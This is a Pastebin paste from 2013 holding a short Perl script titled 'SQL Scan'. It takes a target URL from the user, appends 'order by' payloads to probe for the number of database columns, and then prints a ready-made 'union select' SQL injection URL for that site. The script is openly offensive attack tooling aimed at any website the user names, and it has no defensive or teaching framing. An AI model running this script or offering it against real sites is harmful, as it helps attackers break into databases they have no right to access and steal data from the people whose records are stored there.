Advertisement
AssazziN

SQL Scan

Mar 19th, 2013
441
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 0.73 KB | None | 0 0
  1. use LWP::UserAgent;
  2. print "SQL Injection\n[+] Target \"www.xxx.xxx/index?id=\" = ";
  3. chomp($target=<STDIN>);
  4. unless ($target=~/^http:\/\//) {
  5.     $target='http://'.$target;
  6. }
  7. $sql="1+order+by+";
  8. print "[+] Scan column in ",$target,"\n";
  9. $agent=LWP::UserAgent->new;
  10. for ($i=1;$i<=50;++$i) {
  11.     print "[] Scan : ",$i-1,"\n";
  12.     $bug=$target.$sql.$i;
  13.     $response=$agent->get($bug);
  14.     $content=$response->content;
  15.     if ($content=~m/Warning/ig) {
  16.         $i-=1;
  17.         $bug=$target.$sql.$i;
  18.         print "[+] Found : ",$bug,"\n";
  19.         $ex=$target."1+and+1=0+union+select+1";
  20.         for ($j=2;$j<=$i;++$j) {
  21.             $ex=$ex.",".$j;
  22.         }
  23.         print "[+] Found : ",$ex;
  24.         exit;
  25.     }
  26. }
  27. print "[-] Not Found";
  28.  
  29. #http://comfreedom.blogspot.com/2011/02/perl-sql-scan-2.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement